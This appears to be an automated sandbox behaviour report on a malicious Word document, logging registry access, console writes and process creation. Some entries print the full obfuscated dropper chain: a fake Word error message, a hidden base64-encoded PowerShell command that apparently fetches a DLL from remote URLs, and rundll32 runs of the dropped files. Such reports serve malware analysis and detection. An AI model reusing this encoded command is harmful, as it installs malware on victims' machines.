                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............+..j.....Jq...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......................u.............}..v....8.......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............+..j......................u.............}..v..... ......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j..... ................u.............}..v....8!......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............+..j.....Jq...............u.............}..v.....(......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....(................u.............}..v....8)......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............+..j.....Jq...............u.............}..v.....0......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....0................u.............}..v....81......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............+..j.....Jq...............u.............}..v.....8......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....8................u.............}..v....89......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............+..j......................u.............}..v.....@......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....@................u.............}..v....8A......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v.....H......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....H................u.............}..v....8I......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v.....P......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....P................u.............}..v....8Q......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v.....X......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....X................u.............}..v....8Y......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............h.{.}.}.$.J.8.2.E.=.(.'.W.'.+.(.'.2.8.'.+.'.L.'.).).....h]......0...............XGq.....4.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... ^................u.............}..v.....^......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v....He......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....f................u.............}..v.....f......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j.....Jq...............u.............}..v.....k......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....l................u.............}..v.....m......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......+..j.....Jq...............u.............}..v.....p......0...............XGq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....Pq................u.............}..v.....q......0................Gq.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................K..j....E.................u.............}..v............0.................q.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................K..j....E.................u.............}..v...... .....0.................q.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: N00048481397007.docVirustotal: Detection: 16%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0A